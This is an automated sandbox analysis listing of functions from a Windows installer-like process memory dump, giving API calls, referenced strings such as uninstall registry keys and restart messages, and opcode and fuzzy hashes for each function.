Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow
String ID: 0bE$@
API String ID: 4123100037-122265358
Opcode ID: 8395b34624a7b65c480beec848bd49da82369e2aa995b346deec5b7bbbe1a8e2
Instruction ID: da6395379e4789248bb68ae9639d3fa7cdc2a154edf4300eda36607f7254129a
Opcode Fuzzy Hash: 8395b34624a7b65c480beec848bd49da82369e2aa995b346deec5b7bbbe1a8e2
Instruction Fuzzy Hash: B5319431A012049BCB20DF68C881ADEB3A4AF05714F00866FFC5567392EF39ED49C75A

Uniqueness

Uniqueness Score: -1.00%

Function 004D9AC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(?,004D9BAC,004D75FA,?,00000001,00000000,00000000,004D9BCA,?,?), ref: 004D9B93

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004D9B1D
%s\%s_is1, xrefs: 004D9B3B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 75a274f530c13209f908801a7eb102d1d101e6e5bfd352e72d2acfbc984f906f
Instruction ID: 0e036e32b0eee643e748d4c2650ce68e673eb64dcdf1fafbc9949c39ec5037ec
Opcode Fuzzy Hash: 75a274f530c13209f908801a7eb102d1d101e6e5bfd352e72d2acfbc984f906f
Instruction Fuzzy Hash: C231B470A002089FDB00DBA9DC62AAEB7F8FB49304F51407BE504F7381D779AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 004AA2DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004AA36F
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004AA3A0

Strings

open, xrefs: 004AA393

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: 6226b72d3a908e6b84aff4b5a83d13064dfccb5c0d45ef645fc4726cb8e648b8
Instruction ID: e303f42d2cf0764dadaa1299d1c4007adbfe1eed8e9935e8a168fd1f04f58973
Opcode Fuzzy Hash: 6226b72d3a908e6b84aff4b5a83d13064dfccb5c0d45ef645fc4726cb8e648b8
Instruction Fuzzy Hash: EF214F70A00204AFDF04DFA9C882B9EB7B8EB55704F51847AA805E7292D779AE50CB49

Uniqueness

Uniqueness Score: -1.00%

Function 004D26F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(0050BCD4,0050BCD4,00000001,00000000,00000000,004D2784,?,?,00000000,00000000), ref: 004D275C

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 004D271D
DP, xrefs: 004D2731

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths\$DP
API String ID: 47109696-341591329
Opcode ID: f8781773c4dd3b51b01af4ce0903016f42a51fdcba9e2906a35cb57a0906506f
Instruction ID: 9f2a55468eb2d1bf0a57708e7fa96f110675d2761a89aaa6d861d79ef19944fa
Opcode Fuzzy Hash: f8781773c4dd3b51b01af4ce0903016f42a51fdcba9e2906a35cb57a0906506f
Instruction Fuzzy Hash: 4501D6307002046FDB14EB658962AAEB7EDDB99714F61407BF905E33C1EAB89E00966C

Uniqueness

Uniqueness Score: -1.00%

Function 00412ED8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32 ref: 00412EFA
GetSystemMetrics.USER32 ref: 00412F4B

Strings

\)P, xrefs: 00412F25

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleMetricsSystemThread
String ID: \)P
API String ID: 3035471613-3049963737
Opcode ID: f1529f4f3e982c8e6eb539465a84f6e727f9ce11be0cf3805865be927159e22a
Instruction ID: 50cd9c9b77890bafca8ea87f72a24f18ef828198aef6e3af61819e877b2cc8b6
Opcode Fuzzy Hash: f1529f4f3e982c8e6eb539465a84f6e727f9ce11be0cf3805865be927159e22a
Instruction Fuzzy Hash: 7801D6702042518ADB109E2695853A37BE5AB51315F08C0ABED48CF3D7DABDC8D6D3B9

Uniqueness

Uniqueness Score: -1.00%

Function 004FD28C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 004B00AC: GetCurrentProcess.KERNEL32(00000028), ref: 004B00BC
Part of subcall function 004B00AC: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004B00C2

SetForegroundWindow.USER32(?), ref: 004FD2C5

Strings

Restarting Windows., xrefs: 004FD29C
Not restarting Windows because Uninstall is being run from the debugger., xrefs: 004FD2FC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
API String ID: 3179053593-4147564754
Opcode ID: 96529cc31a45527a3be0a4759eb50d0f5700797e19f6739869a7adae3deddeab
Instruction ID: d1f48b287f888cff443f9a9cc7583872310ba117a82dfd622287828ac23461ad
Opcode Fuzzy Hash: 96529cc31a45527a3be0a4759eb50d0f5700797e19f6739869a7adae3deddeab
Instruction Fuzzy Hash: 46115A34A041489FD701EB65E945BAD33E5AF49308F554077FA01A73A2C77CAC459B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0044AAAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001,00000000,0044AB2B,?,?,?,00000000), ref: 0044AAC9
SetTimer.USER32 ref: 0044AAEB

Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1

Strings

8B, xrefs: 0044AB06

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer$KillLoadString
String ID: 8B
API String ID: 1423459280-4165284811
Opcode ID: 0a3234fbc0903c3fb04e2019c515a137aac41003fe305c9b6d742416ca09ee96
Instruction ID: b9c06d8f07b52db84a512ba5dd8922f7f6612851b00a9a57e0db484b0ae24fa4
Opcode Fuzzy Hash: 0a3234fbc0903c3fb04e2019c515a137aac41003fe305c9b6d742416ca09ee96
Instruction Fuzzy Hash: 0401D430350240AFEB21EF61CD86F5A37ADEB08748F5005A6FE00AB2D6D679BC50C65D

Uniqueness

Uniqueness Score: -1.00%

Function 004380F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44threadCOMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?), ref: 0043812B
SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00438095), ref: 00438138

Strings

X`P, xrefs: 004380FF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CompareExchangeInterlockedSwitchThread
String ID: X`P
API String ID: 3384000618-2474155081
Opcode ID: f4ae14c70a5bbde5847d0e2af1d60944898d8ced8394b342272b69a43e0bbee8
Instruction ID: a684994c5c8966657b84c01853d2f82025a43701f920f47f23174a89fcf2eaf0
Opcode Fuzzy Hash: f4ae14c70a5bbde5847d0e2af1d60944898d8ced8394b342272b69a43e0bbee8
Instruction Fuzzy Hash: 97F0FC722097845AEB2115199C41B3AA699DBC6371F35163FF098872D1C92D4C43836A

Uniqueness

Uniqueness Score: -1.00%

Function 0042DC78, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042DCC6
GetSystemMetrics.USER32 ref: 0042DCD8

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

Strings

MonitorFromPoint, xrefs: 0042DC8A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: c206c6802f49a28d527c846d294ff08559927eed22d090e7df17a883bf7e1f71
Instruction ID: c196b6dbe358f2d2bbcfebf0ee2a54d3fef1980992c31caf8b94c3b9d6220515
Opcode Fuzzy Hash: c206c6802f49a28d527c846d294ff08559927eed22d090e7df17a883bf7e1f71
Instruction Fuzzy Hash: D901A271B082246FDB004F52FC48B5FBB59FBA4355F90801BF9049B251C2F59C48DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042DB28, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042DB79
GetSystemMetrics.USER32 ref: 0042DB85

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

Strings

MonitorFromRect, xrefs: 0042DB3D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: f5d85c7e71d0c9417e1827471a2e6bf2f603beb8a552f53d0b11e2b1a6a850b0
Instruction ID: 908d55ac1df62638f4d21ea26ee818da5ecf9f520e84bc79be8dc3c796858caa
Opcode Fuzzy Hash: f5d85c7e71d0c9417e1827471a2e6bf2f603beb8a552f53d0b11e2b1a6a850b0
Instruction Fuzzy Hash: 9701A232B103649BD7108B14E899B9BBF9DE750361F994052E904CF347C2B8EC889BAD

Uniqueness

Uniqueness Score: -1.00%

Function 005010F8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004A4EC4: LoadLibraryW.KERNEL32(00000000,00000000,004A52A5,?,?,00000000,00000000), ref: 004A4F24

Part of subcall function 004C1544: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004C1557

LoadLibraryW.KERNEL32(00000000,SHPathPrepareForWriteW,00000000,00501174,?,00000000,00000000), ref: 00501149

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

shell32.dll, xrefs: 00501136
SHPathPrepareForWriteW, xrefs: 0050111B

Memory Dump Source

Source File: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem
String ID: SHPathPrepareForWriteW$shell32.dll
API String ID: 4217395396-2333554631
Opcode ID: 9be8a9ce0913e42742eb121f3a81a3bef2064db0891506f8d18add09e1601325
Instruction ID: d2076e21e6a4ae630d861e28d712c2a80a3806e69932692b9a229b2c139dc0e0
Opcode Fuzzy Hash: 9be8a9ce0913e42742eb121f3a81a3bef2064db0891506f8d18add09e1601325
Instruction Fuzzy Hash: 88F04F34500608BBDB04EBA2D943A8D7BBCFB4570CF51847AF500A66D2DB789E14DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004FDDEC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 004DEED0: FreeLibrary.KERNEL32(?,004FDE18,00000000,004FDE27,?,?,?,?,?,004FE903), ref: 004DEEE6

Part of subcall function 004DEAEC: GetTickCount.KERNEL32 ref: 004DEB34

Part of subcall function 004B2054: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 004B2073

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,004FE903), ref: 004FDE41
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,004FE903), ref: 004FDE47

Strings

Detected restart. Removing temporary directory., xrefs: 004FDDFB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: 6be13c5cc4cdbd5350a372fd4f9851076ee7480567fea7ec74461a7536726691
Instruction ID: 5c652130c74be1b4518fb524f9ea07f6a8bccad035dd6fa265c4fe7db097e18b
Opcode Fuzzy Hash: 6be13c5cc4cdbd5350a372fd4f9851076ee7480567fea7ec74461a7536726691
Instruction Fuzzy Hash: 65E02B72A08A486DE6123BB77C1697B7B9ED757728B51083BF3048A643CA2D5C14D23C

Uniqueness

Uniqueness Score: -1.00%

Function 00452924, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 0045293F
GetKeyState.USER32(00000011), ref: 00452950

Strings

, xrefs: 0045295F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: 7d93798c207586ada7ae01befcddc06c46c426bd79fde4a8b4352762cc2e625d
Instruction ID: e5f2dde1b85970a6f7d963af67b364511ef951f9b4c27a929f10f444735450ec
Opcode Fuzzy Hash: 7d93798c207586ada7ae01befcddc06c46c426bd79fde4a8b4352762cc2e625d
Instruction Fuzzy Hash: CCE022A2700A4602FB11757A1D103EB17D04F537AAF0806AFBEC03A2C3E1DE0E0A90A9

Uniqueness

Uniqueness Score: -1.00%

Function 004395AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(DWMAPI.DLL,?,?,00439672,?,00461693), ref: 004395D2

Strings

DwmIsCompositionEnabled, xrefs: 004395EA
DWMAPI.DLL, xrefs: 004395CD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: DWMAPI.DLL$DwmIsCompositionEnabled
API String ID: 1029625771-2128843254
Opcode ID: f522c6db7636a78b0fb4951b1d1f8cd1b4d5f1cbe338c0086e8703c7932d1cb0
Instruction ID: d9ddd3255d6c6f21e8be2380f661a2a9546a3235c066a32dca0437954f0ef390
Opcode Fuzzy Hash: f522c6db7636a78b0fb4951b1d1f8cd1b4d5f1cbe338c0086e8703c7932d1cb0
Instruction Fuzzy Hash: 12F0B7B1603210DEF721AB64ACDD75F3294971C305F00502BA925962A1C7BC0C89EF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00480A80, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00480B10: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480B1E

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000,004E2D5F), ref: 00480A98

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

ShutdownBlockReasonCreate, xrefs: 00480A8E
user32.dll, xrefs: 00480A93

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule$AddressProc
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 1883125708-2866557904
Opcode ID: cba206176e321c2248df8f07573990aafbe82fc30c36031109e3db0fced35097
Instruction ID: 79447cd1c673bd27a84cde0503538fed572911d91e3c84c19a2cc8397376a013
Opcode Fuzzy Hash: cba206176e321c2248df8f07573990aafbe82fc30c36031109e3db0fced35097
Instruction Fuzzy Hash: 74E0C2227307203A828572BE0C91E2F008C8EE165D3250C3BF011E2243D9ADCC0A43AD

Uniqueness

Uniqueness Score: -1.00%

Function 00480B10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480B1E

